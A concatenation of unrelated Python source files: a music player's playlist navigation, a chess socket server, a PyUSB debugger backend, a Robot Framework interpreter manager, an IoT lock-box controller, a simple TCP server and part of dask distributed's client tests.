self.info["random_index"] = 0
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
# switch_flag为true表示:
# 在播放列表中 || 当前所在列表类型不在"songs"、"djchannels"、"fmsongs"中
def play_or_pause(self, idx, switch_flag):
if self.is_empty:
return
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx and switch_flag:
if not self.popen_handler:
self.replay()
else:
self.switch()
else:
self.info["idx"] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info["random_index"]
if (
random_index >= len(playing_order)
or playing_order[random_index] != self.index
):
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
# make sure self.index will not over
if self.info["idx"] < playlist_len:
self.info["idx"] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
playing_order_len = len(self.order)
self.info["random_index"] += 1
# Out of border
if self.mode == Player.MODE_RANDOM_LOOP:
self.info["random_index"] %= playing_order_len
# Random but not loop, out of border, stop playing.
if self.info["random_index"] >= playing_order_len:
self.info["idx"] = playlist_len
else:
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info["idx"] > 0:
self.info["idx"] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.info["idx"] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info["random_index"] -= 1
if self.info["random_index"] < 0:
if self.mode == Player.MODE_RANDOM:
self.info["random_index"] = 0
else:
self.info["random_index"] %= playing_order_len
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info["playing_mode"] = Player.MODE_RANDOM
self.shuffle_order()
self.info["idx"] = self.info["playing_order"][self.info["random_index"]]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
|
server.py
|
import threading
import socket
import json
import time
import chess
__all__ = ['Server', 'Communicator', 'Communicator2']
class Server(object):
def __init__(self, app):
self.app = app
self._names = [
None,
None
]
# self._communicators = [
# Communicator(0, chess.config['slot_0_ip'], chess.config['slot_0_port']),
# Communicator(1, chess.config['slot_1_ip'], chess.config['slot_1_port'])
# ]
# self._threads = [
# threading.Thread(target=self._communicators[0].run),
# threading.Thread(target=self._communicators[1].run)
# ]
def clear_buffers(self):
for c in self._communicators:
c.clear_buffers()
def start(self):
for t in self._threads:
t.daemon = True
t.start()
def verify_connection(self):
pass
# for i in xrange(2):
# comm = self._communicators[i]
# if comm.name and self._names[i] is None:
# self._names[i] = comm.name
# self.app.connect_user(i, comm.name)
# elif self._names[i] is not None and comm.name is None:
# self._names[i] = None
# self.app.disconnect_user(i)
def send_state(self, id_, state):
self._communicators[id_].send(json.dumps(state))
def receive_movement(self, id_):
r = self._communicators[id_].receive()
if r:
return json.loads(r)
return None
class Communicator2(object):
def __init__(self, id_, host, port):
self._id = id_
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.bind((host, port))
self._socket.listen(1)
self._connection = None
self._address = None
self._inbox = []
self._outbox = []
self.name = None
def clear_buffers(self):
self._inbox = []
self._outbox = []
def send(self, msg):
self._outbox.append(msg)
def receive(self):
if self._inbox:
return self._inbox.pop(0)
def _listen(self):
try:
chess.log.debug('NETWORK', 'Slot %d waiting connection.'%self._id)
self._connection, self._address = self._socket.accept()
chess.log.debug('NETWORK', 'Slot %d connected.'%self._id)
return True
except:
chess.log.error('NETWORK', 'Error on connection at slot %d.'%self._id)
return False
def _receive_name(self):
try:
chess.log.debug('NETWORK', 'Slot %d waiting for user name.'%self._id)
data = self._connection.recv(2**12)
name = json.loads(data)
self.name = name['name']
chess.log.debug('NETWORK', 'Slot %d connected with user "%s".'%(self._id, self.name))
return True
except:
chess.log.error('NETWORK', 'Error on receiving name at slot %d.'%self._id)
return False
def _receive_data(self):
try:
data = self._connection.recv(2**12)
if data:
self._inbox.append(data)
chess.log.debug('NETWORK', 'Slot %s received: "%s"'%(self._id, data))
return True
else:
return False
except socket.timeout as e:
return True
def _send_data(self):
while self._outbox:
data = self._outbox.pop(0)
self._connection.sendall(data)
chess.log.debug('NETWORK', 'Slot %s sent: "%s"'%(self._id, data))
return True
def run(self):
while True:
self.name = None
worked = self._listen()
if not worked: continue
worked = self._receive_name()
if not worked: continue
try:
self._connection.settimeout(0.01)
while True:
worked = self._receive_data()
if not worked: raise socket.error
worked = self._send_data()
if not worked: raise socket.error
except socket.error as e:
chess.log.debug('NETWORK', 'Slot %d disconnected.'%self._id)
class Communicator(object):
def __init__(self, host, port):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.bind((host, port))
self._socket.listen(1)
self._running = True
self._connection = None
self._address = None
self._inbox = []
self._outbox = []
self.name = None
def clear_buffers(self):
self._inbox = []
self._outbox = []
def send(self, msg):
self._outbox.append(msg)
def receive(self):
if self._inbox:
return self._inbox.pop(0)
def stop(self):
self._socket.close()
self._running = False
def _listen(self):
try:
# chess.log.debug('NETWORK', 'Communicator waiting connection.')
self._connection, self._address = self._socket.accept()
chess.log.debug('NETWORK', 'Communicator connected.')
return True
except socket.timeout as e:
return False
except:
chess.log.error('NETWORK', 'Error on connection.')
return False
def _receive_name(self):
try:
# chess.log.debug('NETWORK', 'Communicator waiting for user name.')
data = self._connection.recv(2**12)
name = json.loads(data)
self.name = name['name']
chess.log.debug('NETWORK', 'Communicator connected with user "%s".'%self.name)
return 1
except socket.timeout as e:
return 0
except:
chess.log.error('NETWORK', 'Error on receiving name.')
return -1
def _receive_data(self):
try:
data = self._connection.recv(2**12)
if data:
self._inbox.append(data)
chess.log.debug('NETWORK', 'Communicator received: "%s"'%data)
return True
else:
return False
except socket.timeout as e:
return True
def _send_data(self):
while self._outbox:
data = self._outbox.pop(0)
self._connection.sendall(data)
chess.log.debug('NETWORK', 'Communicator sent: "%s"'%data)
return True
def run(self):
while self._running:
self.name = None
self._socket.settimeout(0.1)
worked = self._listen()
if not worked: continue
try:
self._connection.settimeout(0.01)
while self._running:
worked = self._receive_name()
if worked == 1: break
elif worked == -1: raise socket.error
while self._running:
# print 'trying to receive'
worked = self._receive_data()
if not worked: raise socket.error
# print 'trying to send'
worked = self._send_data()
if not worked: raise socket.error
except socket.error as e:
chess.log.debug('NETWORK', 'Communicator disconnected.')
|
pyusb_backend.py
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from interface import Interface
import logging, os, threading
try:
import usb.core
import usb.util
except:
if os.name == "posix" and not os.uname()[0] == 'Darwin':
logging.error("PyUSB is required on a Linux Machine")
isAvailable = False
else:
isAvailable = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
vid = 0
pid = 0
intf_number = 0
isAvailable = isAvailable
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.closed = False
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
def start_rx(self):
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
while not self.closed:
self.read_sem.acquire()
if not self.closed:
# Timeouts appear to corrupt data occasionally. Because of this the
# timeout is set to infinite.
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, -1))
@staticmethod
def getAllConnectedInterface(vid, pid):
"""
returns all the connected devices which matches PyUSB.vid/PyUSB.pid.
returns an array of PyUSB (Interface) objects
"""
# find all devices matching the vid/pid specified
all_devices = usb.core.find(find_all=True, idVendor=vid, idProduct=pid)
if not all_devices:
logging.debug("No device connected")
return None
boards = []
# iterate on all devices found
for board in all_devices:
interface_number = -1
# get active config
config = board.get_active_configuration()
# iterate on all interfaces:
# - if we found a HID interface -> CMSIS-DAP
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number == -1:
continue
try:
if board.is_kernel_driver_active(interface_number):
board.detach_kernel_driver(interface_number)
except Exception as e:
print e
ep_in, ep_out = None, None
for ep in interface:
if ep.bEndpointAddress & 0x80:
ep_in = ep
else:
ep_out = ep
product_name = usb.util.get_string(board, 2)
vendor_name = usb.util.get_string(board, 1)
"""If there is no EP for OUT then we can use CTRL EP"""
if not ep_in:
logging.error('Endpoints not found')
return None
new_board = PyUSB()
new_board.ep_in = ep_in
new_board.ep_out = ep_out
new_board.dev = board
new_board.vid = vid
new_board.pid = pid
new_board.intf_number = interface_number
new_board.product_name = product_name
new_board.vendor_name = vendor_name
new_board.start_rx()
boards.append(new_board)
return boards
def write(self, data):
"""
write data on the OUT endpoint associated to the HID interface
"""
report_size = 64
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
pass
return self.rcv_data.pop(0)
def setPacketCount(self, count):
# No interface level restrictions on count
self.packet_count = count
def close(self):
"""
close the interface
"""
logging.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
usb.util.dispose_resources(self.dev)
|
rf_interpreter_server_manager.py
|
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.basic import is_process_alive, log_and_silence_errors
import itertools
from functools import partial
import os
import sys
import threading
from typing import Any, Dict, Optional
from robocorp_ls_core.protocols import ActionResultDict, IConfig
from robocorp_ls_core.options import DEFAULT_TIMEOUT, USE_TIMEOUTS, NO_TIMEOUT
log = get_logger(__name__)
_next_id = partial(next, itertools.count(0))
def create_server_socket(host, port):
try:
import socket as socket_module
server = socket_module.socket(
socket_module.AF_INET, socket_module.SOCK_STREAM, socket_module.IPPROTO_TCP
)
if sys.platform == "win32":
server.setsockopt(
socket_module.SOL_SOCKET, socket_module.SO_EXCLUSIVEADDRUSE, 1
)
else:
server.setsockopt(socket_module.SOL_SOCKET, socket_module.SO_REUSEADDR, 1)
server.bind((host, port))
except Exception:
server.close() # i.e.: close (we just accept 1 connection).
raise
return server
class RfInterpreterServerManager:
def __init__(
self,
verbose: int = 0,
base_log_file: str = "",
on_interpreter_message=None,
uri: str = "",
):
from robotframework_interactive.server.rf_interpreter_ls_config import (
RfInterpreterRobotConfig,
)
from robocorp_ls_core import uris
assert uri
self._uri = uri
self._filename = uris.to_fs_path(uri)
self._lock_api_client = threading.RLock()
self._server_process = None
self._log_extension = ".rf_interpreter"
self._disposed = False
# The config allows clients to set the python executable/env.
self._config: IConfig = RfInterpreterRobotConfig()
self._verbose = verbose
self._base_log_file = base_log_file
self._on_interpreter_message = on_interpreter_message
@property
def uri(self) -> str:
return self._uri
@property
def filename(self) -> str:
return self._filename
@property
def config(self) -> IConfig:
return self._config
@config.setter
def config(self, config: IConfig):
with self._lock_api_client:
self._config.update(config.get_full_settings())
def _get_python_executable(self) -> str:
with self._lock_api_client:
from robotframework_interactive.server.rf_interpreter_ls_config import (
OPTION_ROBOT_PYTHON_EXECUTABLE,
)
config = self._config
python_exe = sys.executable
if config is not None:
python_exe = config.get_setting(
OPTION_ROBOT_PYTHON_EXECUTABLE, str, default=python_exe
)
else:
log.warning(f"self._config not set in {self.__class__}")
return python_exe
def _get_environ(self) -> Dict[str, str]:
from robotframework_interactive.server.rf_interpreter_ls_config import (
OPTION_ROBOT_PYTHON_ENV,
OPTION_ROBOT_PYTHONPATH,
)
with self._lock_api_client:
config = self._config
env = os.environ.copy()
env.pop("PYTHONPATH", "")
env.pop("PYTHONHOME", "")
env.pop("VIRTUAL_ENV", "")
if config is not None:
env_in_settings = config.get_setting(
OPTION_ROBOT_PYTHON_ENV, dict, default={}
)
for key, val in env_in_settings.items():
env[str(key)] = str(val)
pythonpath_entries = config.get_setting(
OPTION_ROBOT_PYTHONPATH, list, []
)
if pythonpath_entries:
# if robot.pythonpath is defined, append those entries to
# the PYTHONPATH env variable when starting the interactive
# console.
current_pythonpath = env.get("PYTHONPATH", "")
if not current_pythonpath:
env["PYTHONPATH"] = os.pathsep.join(pythonpath_entries)
else:
existing = set(current_pythonpath.split(os.pathsep))
env["PYTHONPATH"] = (
current_pythonpath
+ os.pathsep
+ os.pathsep.join(
(
str(x)
for x in pythonpath_entries
if x not in existing
)
)
)
else:
log.warning("self._config not set in %s" % (self.__class__,))
return env
def _get_api_client(self) -> Any:
with self._lock_api_client:
server_process = self._server_process
if server_process is not None:
# If someone killed it, dispose of internal references
# and create a new process.
if not is_process_alive(server_process.pid):
self._dispose_server_process()
if self._disposed:
log.info("Robot Framework Interpreter server already disposed.")
return None
if server_process is None:
try:
from robotframework_interactive.server.rf_interpreter__main__ import (
start_server_process,
)
from robocorp_ls_core.jsonrpc.streams import (
JsonRpcStreamWriter,
JsonRpcStreamReader,
)
from robotframework_interactive.server.rf_interpreter_client import (
RfInterpreterApiClient,
)
args = []
if self._verbose:
args.append("-" + "v" * int(self._verbose))
if self._base_log_file:
log_id = _next_id()
# i.e.: use a log id in case we create more than one in the
# same session.
if log_id == 0:
args.append(
"--log-file="
+ self._base_log_file
+ self._log_extension
)
else:
args.append(
"--log-file="
+ self._base_log_file
+ (".%s" % (log_id,))
+ self._log_extension
)
python_exe = self._get_python_executable()
environ = self._get_environ()
connect_event = threading.Event()
s = create_server_socket(host="127.0.0.1", port=0)
import socket as socket_module
new_socket: Optional[socket_module.socket] = None
connect_event = threading.Event()
def wait_for_connection():
nonlocal new_socket
try:
s.settimeout(
DEFAULT_TIMEOUT if USE_TIMEOUTS else NO_TIMEOUT
)
s.listen(1)
new_socket, _addr = s.accept()
log.info("Connection accepted")
except:
log.exception("Server did not connect.")
finally:
connect_event.set()
s.close()
t = threading.Thread(target=wait_for_connection)
t.start()
# Now, we're listening, let's start up the interpreter to connect back.
_, port = s.getsockname()
args.append("--tcp")
args.append("--host")
args.append("127.0.0.1")
args.append("--port")
args.append(str(port))
cwd = os.path.dirname(self._filename)
if not os.path.isdir(cwd):
raise AssertionError(f"CWD passed is not a directory: {cwd}")
server_process = start_server_process(
args=args, python_exe=python_exe, env=environ, cwd=cwd
)
self._server_process = server_process
connect_event.wait()
if new_socket is None:
raise RuntimeError(
"Timed out while waiting for interpreter server to connect."
)
read_from = new_socket.makefile("rb")
write_to = new_socket.makefile("wb")
w = JsonRpcStreamWriter(write_to, sort_keys=True)
r = JsonRpcStreamReader(read_from)
api = self._rf_interpreter_api_client = RfInterpreterApiClient(
w,
r,
server_process,
on_interpreter_message=self._on_interpreter_message,
)
log.debug(
"Initializing rf interpreter api... (this pid: %s, api pid: %s).",
os.getpid(),
server_process.pid,
)
api.initialize(process_id=os.getpid())
except Exception as e:
if server_process is None:
log.exception(
"Error starting rf interpreter server api (server_process=None)."
)
else:
exitcode = server_process.poll()
if exitcode is not None:
# Note: only read() if the process exited.
log.exception(
"Error starting rf interpreter server api. Exit code: %s Base exception: %s. Stderr: %s",
exitcode,
e,
server_process.stderr.read(),
)
else:
log.exception(
"Error (%s) starting rf interpreter server api (still running). Base exception: %s.",
exitcode,
e,
)
self._dispose_server_process()
finally:
if server_process is not None:
log.debug(
"Server api (%s) created pid: %s", self, server_process.pid
)
else:
log.debug("server_process == None in _get_api_client()")
return self._rf_interpreter_api_client
@log_and_silence_errors(log)
def _dispose_server_process(self):
from robocorp_ls_core.basic import kill_process_and_subprocesses
with self._lock_api_client:
try:
log.debug("Dispose server process.")
if self._server_process is not None:
if is_process_alive(self._server_process.pid):
kill_process_and_subprocesses(self._server_process.pid)
finally:
self._disposed = True
self._server_process = None
self._rf_interpreter_api_client = None
def interpreter_start(self, uri: str) -> ActionResultDict:
api = self._get_api_client()
if api is not None:
return api.interpreter_start(uri)
return {
"success": False,
"message": "Unable to start Robot Framework Interpreter server api.",
"result": None,
}
@property
def waiting_input(self):
api = self._get_api_client()
if api is not None:
return api.waiting_input
return False
def interpreter_evaluate(self, code: str) -> ActionResultDict:
api = self._get_api_client()
if api is not None:
return api.interpreter_evaluate(code)
return {
"success": False,
"message": "Robot Framework Interpreter server api not available.",
"result": None,
}
def interpreter_compute_evaluate_text(
self, code: str, target_type: str = "evaluate"
) -> ActionResultDict:
"""
:param target_type:
'evaluate': means that the target is an evaluation with the given code.
This implies that the current code must be changed to make sense
in the given context.
'completions': means that the target is a code-completion
This implies that the current code must be changed to include
all previous successful evaluations so that the code-completion
contains the full information up to the current point.
"""
api = self._get_api_client()
if api is not None:
return api.interpreter_compute_evaluate_text(code, target_type)
return {
"success": False,
"message": "Robot Framework Interpreter server api not available.",
"result": None,
}
def interpreter_stop(self):
api = self._get_api_client()
if api is not None:
try:
return api.interpreter_stop()
finally:
# After a stop, also dispose the process. It can't be reused
# (a new manager must be created).
self._dispose_server_process()
return {
"success": False,
"message": "Unable to stop Robot Framework Interpreter server api.",
"result": None,
}
|
__main__.py
|
import multiprocessing as mp
import json
from time import sleep
from Network.networking import send_data, form_packet
from arduino_ver1.Translation import buzzer_on, SetLock, SetAngle, rc_time, light, writeWarning
def start_polling(poll_output_queue: mp.Queue, host: str):
"""Start polling the server for data"""
while True:
sleep(1)
print("Poll")
msg = form_packet(host)
content = "".join(send_data(msg)).split("\r\n")[-1]
poll_output_queue.put(content)
if __name__ == "__main__":
input_queue = mp.Queue()
output_queue = mp.Queue()
proc = mp.Process(target=start_polling, args=(output_queue, '192.168.43.32:12345'))
proc.daemon = True
proc.start()
buzzer_cycle = 0
isLocked = True
while True:
args = []
sleep(0.1)
# Blocks on getting data
content = output_queue.get()
if False:
# Check if the opening is valid
# If photosensor and isLocked are contradictory make a buzzer sound
if rc_time(light) and isLocked:
buzzer_cycle = 5
writeWarning((
"WARNING",
"Unauthorized Access",
"Alarm Activated"
))
continue
print("loop")
content = json.loads(content)
lock = content['lock']
buzzer = content['buzzer']
# Check if user wants to activate the buzzer
if buzzer:
# Set buzzer cycle = 5
buzzer_cycle = 10
writeWarning((
"Alarm Activated",
"Locate Box Protocol",
"Find my box"
))
if isLocked != lock:
# Activate / Deactivate lock
isLocked = lock
if isLocked:
writeWarning((
"Closing the Lid",
"Locking the box",
"Thank you for using"
))
# Lock the box
SetAngle(90)
SetLock(90)
else:
writeWarning((
"Unlocking the box",
"Opening the Lid",
"Thank you for using"
))
# Unlock the box
SetLock(0)
SetAngle(0)
# Check if the buzzer still needs ringing
if buzzer_cycle:
# Activate buzzer
buzzer_on()
# Decrement cycle
buzzer_cycle -= 1
|
tcp3server.py
|
import socket
import threading
import CompressAndDecompress
from CompressAndDecompress import Compressed
class TCPserver():
def __init__(self):
self.server_ip='localhost'
self.server_port = 9999
def main(self):
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((self.server_ip, self.server_port))
server.listen(1)
print(f'[*] Listening on {self.server_ip}:{self.server_port}')
while True:
client, address = server.accept()
print(f'[*] Accepted connection from {address[0]}:{address[1]}')
client_handler =threading.Thread(target=self.handle_client, args=(client,))
client_handler.start()
def handle_client(self,client_socket):
with client_socket as sock:
request = sock.recv(1024)
# print("data List",type(request))
# # print(f'CypherText{dataList[0]}: Key{dataList[1]}')
print("####################################################")
print(f'[*] Received: {request.decode("utf-8")}')
testString = request.decode("utf-8")
testString = testString.split(',')
print(f'CypherText{testString[0]} : Key:{testString[1]}')
#Changing to integer to decompress
# Received: int = int(request.decode("utf-8"))
# print("Type of Received:>",type(Received))
#1-calling compressAndDecompress
#2-call Compress Class from compress and decompress
# deletestring='test'
#working code
# changeData = Compressed(deletestring,Received)
# DeData:str =changeData.decompress()
# print("Decompressed Data From client:>",DeData)
sock.send(b'ACK')
# toSend=bytes(request)
# sock.send()
if __name__ == '__main__':
Myserver = TCPserver()
Myserver.main()
|
test_client.py
|
import asyncio
from collections import deque
from concurrent.futures import CancelledError
import gc
import logging
from operator import add
import os
import pickle
import psutil
import random
import subprocess
import sys
import threading
from threading import Semaphore
from time import sleep
import traceback
import warnings
import weakref
import zipfile
import pytest
from toolz import identity, isdistinct, concat, pluck, valmap, partial, first, merge
from tornado import gen
import dask
from dask import delayed
from dask.optimization import SubgraphCallable
import dask.bag as db
from distributed import (
Worker,
Nanny,
fire_and_forget,
LocalCluster,
get_client,
secede,
get_worker,
Executor,
profile,
TimeoutError,
)
from distributed.comm import CommClosedError
from distributed.client import (
Client,
Future,
wait,
as_completed,
tokenize,
_get_global_client,
default_client,
futures_of,
temp_default_client,
)
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.scheduler import Scheduler, KilledWorker
from distributed.sizeof import sizeof
from distributed.utils import (
ignoring,
mp_context,
sync,
tmp_text,
tokey,
tmpfile,
is_valid_xml,
)
from distributed.utils_test import (
cluster,
slowinc,
slowadd,
slowdec,
randominc,
inc,
dec,
div,
throws,
geninc,
asyncinc,
gen_cluster,
gen_test,
double,
popen,
captured_logger,
varying,
map_varying,
wait_for,
async_wait_for,
pristine_loop,
save_sys_modules,
)
from distributed.utils_test import ( # noqa: F401
client as c,
client_secondary as c2,
cluster_fixture,
loop,
loop_in_thread,
nodebug,
s,
a,
b,
)
@gen_cluster(client=True, timeout=None)
def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = yield x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = yield z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = yield L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = yield L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = yield total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = yield L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = yield c.gather(L4)
if sys.version_info[0] >= 3:
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = yield c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = yield c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = yield c.gather(L1)
assert results == []
@gen_cluster(client=True)
def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert (yield x) == 2
assert (yield y) == 4
assert (yield z) == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert (yield x) == 2
assert (yield y) == 4
with pytest.raises(ZeroDivisionError, match="eight"):
yield z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
yield x
assert (yield y) == 4
with pytest.raises(ZeroDivisionError, match="seven"):
yield z
@gen_cluster(client=True)
def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
yield x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
yield x
x = c.compute(delayed(varying(args))(), retries=2)
assert (yield x) == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert (yield x) == 3
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y = [delayed(varying(args))() for args in (xargs, yargs)]
x, y = c.compute([x, y], retries={x: 2})
gc.collect()
assert (yield x) == 30
with pytest.raises(ZeroDivisionError, match="five"):
yield y
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.compute([x, y, z], retries={(y, z): 2})
with pytest.raises(ZeroDivisionError, match="one"):
yield x
assert (yield y) == 70
assert (yield z) == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
yield fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
yield fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert (yield fut) == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert (yield fut) == 3
@gen_cluster(client=True)
def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
yield x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert (yield x) == 3
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.persist([x, y, z], retries={(y, z): 2})
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
yield x
assert (yield y) == 70
assert (yield z) == 80
@gen_cluster(client=True)
def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = yield future
assert y == 100
@gen_cluster(client=True)
def test_future_repr(c, s, a, b):
x = c.submit(inc, 10)
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
@gen_cluster(client=True)
def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = yield x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = yield x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
yield x
x.release()
yield gen.moment
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
yield gen.moment
assert not c.futures
x = c.submit(div, 1, 0)
yield x.exception()
x.release()
yield gen.moment
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
